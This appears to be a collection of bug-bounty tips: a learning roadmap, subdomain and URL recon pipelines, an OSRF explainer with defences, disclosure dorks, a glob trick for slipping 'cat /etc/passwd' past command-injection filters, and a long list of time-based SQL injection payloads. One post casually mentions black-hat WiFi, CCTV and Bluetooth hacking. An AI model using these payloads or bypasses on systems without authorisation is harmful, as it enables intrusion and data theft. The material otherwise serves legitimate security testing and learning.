2025 Roadmap:
1) PortSwigger labs:
Pick one lab topic, e.g. SSRF, and give it 2-3 days to complete all of them. For me, I complete these types of labs in a few hours, but don't do that. Do them with a relaxed mind and with the aim of learning, not just completing the labs.
2) HackerOne reports:
The next task is to read all the reports on the same topic as the labs, like SSRF. Just focus on one bug, follow the methodology, learn the real-world scenario and try to find the same on a real-world target.
3) Medium writeups:
Install the Medium app, make an account there and follow all the publications like InfoSec Write-ups and others related to bug hunting. Read their articles and you will get real-world experience. I will soon share all my writeups also.
4) Bugbountyhunting.com
Make an account on that website. It is good for testing your skills; solve their challenges and you will get real-world experience.
5) CTF
Make an account on HTB and TryHackMe and solve only the web app labs and rooms there to get more experience.
6) YT
Follow some people on YouTube who show real-world PoC practicals. You will get a better understanding from a video than from a written PoC; good for beginners.
7) Bookmark
Bookmark some websites like HackTricks and some GitHub pages like bug hunting methodology repos or repos related to payloads and methods. You will get all payloads from there.
8) Engage with people or make friends who have the same interest and work like a team, collaborating with them. That will help you doubly in bug hunting.
9) Don't look for common bugs:
I see many people ask me, "Why don't I find bugs? I spend so much time and still..." The answer is that you are finding bugs that are so common, like XSS and P4s; there are many professional hunters on BBP platforms who have already hunted these on all programs. So it is better to find more advanced bugs like dependency confusion, HTTP request smuggling, BAC, auth bypass, etc. Then your chances are better than before. If you are not finding bugs, that means you need to work on more skills and new methods.
10) Avoid social media
Avoid social media, seriously. This will consume so much of your time. Their algorithms are so strong that they will engage you with the stuff you are interested in; mostly these will show you love, relationships, breakups, beauty, looks perfection, rich things and other mentally disturbing things like soft porn, etc. Also avoid playing online games, please avoid it. If you want to use something, it is better to use LinkedIn, Twitter, etc., or information-sharing apps. This will help your mind focus more on the things that you want.
If you follow these things I am 100% sure you will see results in some months if you are really serious about your life. And I don't think nowadays you need any paid course stuff when the information is already free on the internet. You have all things in your hand; you just need to find it. Also, after ChatGPT, I don't think you need to struggle much on all these things; make ChatGPT your friend. Meanwhile, if you need any help regarding any bugs or chaining, always DM me; I will surely help when I get time. All the best for your new year journey ❤️
Find XSS Using KNOXSS
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
# Subdomain enumeration
subfinder -d domain -all | tee -a domain.subs
subdominator -d domain | tee -a domain.subs
# Check live subdomains
cat domain.subs | httpx -o domain.live
# Collect URLs from archives and crawling
cat domain.live | waybackurls | anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge all results
cat xss-wayback xss-katana xss-gau | anew xss.txt
# Keep only URLs with parameters, drop static assets (extension anchored so ".jsonp?x=" style paths are not swallowed by ".js"), dedupe by parameter structure with uro, confirm live
cat xss.txt | sort -u | grep "=" | grep -Eiv "\.(css|woff|woff2|txt|js|m4r|m4p|m4b|ipa|asa|pkg|crash|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|webp|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|webm|mpp|otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|ttf|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)(\?|$)" | uro | httpx | anew xss
# Run knoxnl with GET & POST methods on the filtered, live list
knoxnl -i xss -X BOTH -s -o xssoutput.txt
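The filtering step of the pipeline above (keep parameterised URLs, drop static assets, collapse URLs that differ only in parameter values) written as a plain shell function so it runs without uro or httpx. This is an added example, not code from the original post; the sample URLs are constructed and the STATIC_EXT list is a shortened stand-in for the long one in the post.

```sh
#!/bin/sh
# Added example (not from the original post): the "keep parameterised URLs,
# drop static assets, dedupe by parameter structure" step of the KNOXSS
# pipeline, as a pure shell function. Input URLs are read from stdin, one
# per line. STATIC_EXT is a shortened stand-in for the post's extension list.

STATIC_EXT='css|woff|woff2|js|gif|jpg|jpeg|png|svg|ico|pdf|zip|mp4|webp|json'

# 1. keep only URLs that carry a query parameter
# 2. drop static assets (extension anchored to "?" or end of line, case-insensitive)
# 3. replace every parameter value with FUZZ so URLs that differ only by value collapse
# 4. sort -u dedupes the normalised list
filter_xss_candidates() {
  grep -F '=' |
    grep -Eiv "\.($STATIC_EXT)(\?|$)" |
    sed -E 's/=[^&]*/=FUZZ/g' |
    sort -u
}

# Constructed sample input (not real targets).
sample_urls() {
  cat <<'EOF'
https://app.example.com/search?q=shoes
https://app.example.com/search?q=boots
https://app.example.com/static/app.js?v=123
https://app.example.com/img/logo.png
https://app.example.com/item?id=7&ref=home
https://app.example.com/item?id=9&ref=mail
https://app.example.com/about
https://app.example.com/assets/theme.CSS?cache=1
EOF
}

# Named wrapper so the result can be checked as a value, not just printed.
run_sample() { sample_urls | filter_xss_candidates; }

run_sample
```

Eight constructed URLs collapse to two candidates (`/item?id=FUZZ&ref=FUZZ` and `/search?q=FUZZ`); the `.js` and `.CSS` assets are dropped even though they carry a query string, and the two parameter-free URLs never enter the list. Pipe the real merged `xss.txt` through `filter_xss_candidates` instead of `sample_urls` to use it on a target.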
Live Bug Bounty Hunting: The Ultimate Checklist to Level Up Your Skills | Bugcrowd | part-(1)
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
🔖 On-Site Request Forgery (OSRF): An Overview
🚨 On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from a domain they control to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself. Attacker-controlled input is reflected into a page, and the victim's browser then sends the request to an endpoint of the attacker's choosing, carrying the victim's cookies.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in src Attributes
Look for inputs that are reflected into attributes like src. Example vulnerable tags:
<img src="OUR_INPUT_HERE">
<video width="400" height="200" controls src="OUR_INPUT_HERE">
<audio src="OUR_INPUT_HERE">
<iframe src="OUR_INPUT_HERE">
👉 If the input can be manipulated, the attacker can point the browser's automatic resource request at an endpoint of their choosing.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
GET /settings.php?remove_account=1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
If such endpoints exist and a reflected src can be pointed at them (e.g. src="/settings.php?remove_account=1"), they may be exploited for OSRF. Because the forged request is same-origin, SameSite cookie attributes and Referer/Origin checks that stop classic CSRF do not help here.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST (with an anti-CSRF token) for state-changing actions. A browser fetching a src URL only ever issues a GET, so a POST-only endpoint cannot be triggered this way.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like src, are validated against an allowlist (for example a fixed path prefix for static assets). A same-origin check alone is not enough, since in OSRF the dangerous target is on the same site.
3. Implement a Content Security Policy (CSP)
CSP directives such as img-src, media-src and frame-src can limit where resources like images or iframes can be loaded from, reducing the risk of requests being sent to external hosts; note that they do not block same-origin targets.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
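The "validate against an allowlist" advice from the OSRF post, shown as the vulnerable reflection next to a hardened version. This is an added example, not code from the post or from the linked AllAboutBugBounty repository; the /static/img/ prefix, the default image and the attacker inputs are assumptions chosen for illustration, and the remove_account endpoint is the one the post itself uses.

```sh
#!/bin/sh
# Added example (not from the original post or the linked repository): a
# reflected "src" value is checked against an allowlist before it is placed
# in an <img> tag. The /static/img/ prefix and default image are assumptions.

# Accepts only a site-relative path under /static/img/ with no query string,
# fragment, parent-directory segment, backslash or scheme. Returns 0 when safe.
# A plain "starts with /" same-origin check would still let
# /settings.php?remove_account=1 through, which is exactly the OSRF case.
is_safe_img_src() {
  case "$1" in
    *'?'*|*'#'*|*'..'*|*'\'*|*':'*) return 1 ;;   # query, fragment, traversal, backslash, scheme
    //*)                             return 1 ;;   # protocol-relative URL -> external host
    /static/img/?*)                  return 0 ;;   # allowlisted prefix with a non-empty name
    *)                               return 1 ;;
  esac
}

# Escapes the characters that matter inside a double-quoted HTML attribute.
attr_escape() {
  printf '%s\n' "$1" | sed -e 's/&/\&amp;/g' -e 's/"/\&quot;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

# Vulnerable: reflects the parameter as-is (this is the OSRF bug).
render_vulnerable() { printf '<img src="%s">' "$1"; }

# Hardened: allowlist first, fall back to a fixed default image otherwise.
render_hardened() {
  if is_safe_img_src "$1"; then
    printf '<img src="%s">' "$(attr_escape "$1")"
  else
    printf '<img src="/static/img/default.png">'
  fi
}

# Constructed attacker inputs: the OSRF target from the post, a protocol-relative
# external host, a traversal attempt, and one legitimate value.
for v in '/settings.php?remove_account=1' '//attacker.example/x.png' \
         '/static/img/../../settings.php' '/static/img/logo.png'; do
  printf 'input: %s\n  vulnerable: %s\n  hardened:   %s\n' \
    "$v" "$(render_vulnerable "$v")" "$(render_hardened "$v")"
done
```

The vulnerable renderer emits `<img src="/settings.php?remove_account=1">`, which every visitor's browser will fetch with their own cookies; the hardened one replaces anything outside the allowlisted prefix with the default image. The allowlist is deliberately a path prefix rather than an origin check, because the target of an OSRF is on the same origin.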
subdomainRecon.txt (3.1 KB)
I have given this file because many of my subscribers requested it. However, I would like to make one request of you: please share my YouTube channel and Telegram channel more.
💻 All About Bug Bounty - Updated!
🔥https://github.com/daffainfo/AllAboutBugBounty
#BugBounty #bugbountytips
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
https://www.virustotal.com/vtapi/v2/domain/report?apikey=<YOUR_API_KEY>&domain=example.com
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Well, many of you will have noticed that I have not been posting any videos lately. This is because I have been recharging with black hat hacking for some time now. I am recharging with many things like WiFi hacking 📡 in as many ways as possible, Bluetooth hacking 🚦, CCTV camera hacking 📸, mobile hacking 📱 and many more things that I will use in my real life. But if I feel that I need to bring a video or course on this topic, then I will definitely bring it and let you know my opinion.
☄️Information Disclosure Dork☄️
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.
Use shell globbing / wildcard expansion. Here is an example:
cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem, so a filter that only looks for the literal string /etc/passwd never sees it.
/e*c: The shell interprets this as "a path component under / starting with e, followed by zero or more characters (*), ending with c."
/p*s*d: This matches a file or directory name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d.
Two things to check when you use it: if the pattern matches several entries, every match is passed to the command as a separate argument, and if it matches nothing, the shell (bash and sh by default) passes the pattern through unchanged, so you get a "No such file or directory" error rather than a false positive.
#bugbountytips #hacking

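The glob trick from the post, run against a naive substring blocklist, with the whole thing contained in a temporary directory so it never touches the real /etc/passwd. This is an added example, not code from the post; the blocklist function is a constructed stand-in for a WAF rule and the fake filesystem is built by the script itself.

```sh
#!/bin/sh
# Added example (not from the original post): shows why "cat /e*c/p*s*d"
# slips past a literal-string filter, inside a throwaway directory so the
# real /etc/passwd is never read. naive_blocklist_allows is a constructed
# stand-in for a WAF rule, not any real product's logic.

# Naive "WAF": reject the payload only if it contains the literal sensitive path.
naive_blocklist_allows() {
  case "$1" in
    *'/etc/passwd'*|*'/etc/shadow'*) return 1 ;;
    *) return 0 ;;
  esac
}

# Build a fake root with etc/passwd (and a decoy ext/ dir) for the glob to match.
make_fake_root() {
  d="$(mktemp -d)"
  mkdir -p "$d/etc" "$d/ext"
  printf 'root:x:0:0:root:/root:/bin/sh\n' > "$d/etc/passwd"
  printf 'nothing here\n' > "$d/ext/notes"
  printf '%s' "$d"
}

# Expand a pattern under the fake root exactly as an injected, unquoted
# "cat $PAYLOAD" would (word splitting + pathname expansion) and print the result.
expand_in_root() {
  root="$1"; pattern="$2"
  ( cd "$root" && set -- $pattern && printf '%s\n' "$@" )
}

# Same, but with pathname expansion disabled (set -f): the input reaches the
# command literally, which is what happens when user input is passed as an
# argument without ever going through a shell.
expand_noglob_in_root() {
  root="$1"; pattern="$2"
  ( cd "$root" && set -f && set -- $pattern && printf '%s\n' "$@" )
}

# Read the file through the same expansion, i.e. what "cat /e*c/p*s*d" does.
read_via_glob() {
  root="$1"; pattern="$2"
  ( cd "$root" && cat $pattern )
}

root="$(make_fake_root)"
for p in '/etc/passwd' '/e*c/p*s*d'; do
  if naive_blocklist_allows "$p"; then verdict=allowed; else verdict=blocked; fi
  rel="${p#/}"   # drop the leading slash so expansion happens under the fake root
  printf '%-12s -> blocklist: %s, expands to: %s\n' \
    "$p" "$verdict" "$(expand_in_root "$root" "$rel")"
done
read_via_glob "$root" 'e*c/p*s*d'
printf 'with set -f: %s\n' "$(expand_noglob_in_root "$root" 'e*c/p*s*d')"
rm -rf "$root"
```

The literal path is blocked while the glob form is allowed, yet both expand to the same `etc/passwd` and the glob read returns the file's contents. The `set -f` variant shows the defender's side: once the input is not interpreted by a shell (or globbing is off), `e*c/p*s*d` is just a filename that does not exist, which is why the fix for command injection is to stop passing user input through a shell rather than to extend the blocklist.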
Time-based payloads for different DBMS:
# MySQL / MariaDB (sleep)
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
\/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
# Microsoft SQL Server (WAITFOR DELAY)
'WAITFOR DELAY '0:0:7';%00
'WAITFOR DELAY '0:0:7'#
'WAITFOR DELAY '0:0:7'%23
WAITFOR DELAY '0:0:7'#
WAITFOR DELAY '0:0:7'%23
WAITFOR DELAY '0:0:7'--+-
'WAITFOR DELAY '0:0:7'--+-
'WAITFOR DELAY '0:0:7'='
# PostgreSQL (pg_sleep)
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
🛍https://github.com/errorfiathck/IDOR-Forge
# Pull archived URLs, extract every referenced .js file, fetch each one and grep out the endpoints / AJAX paths it contains
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" \
  | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+\.js[^'\"> ]*" \
  | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu \
  | xargs -I '%' sh -c 'curl -k -s "%" | sed "s/[;}\)>]/\n/g" | grep -Po "([\x27\"](https?:)?[/]{1,2}[^\x27\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*[\x27\"](https?:)?[/]{1,2}[^\x27\"> ]{5,})"' \
  | awk -F "['\"]" '{print $2}' | sort -fu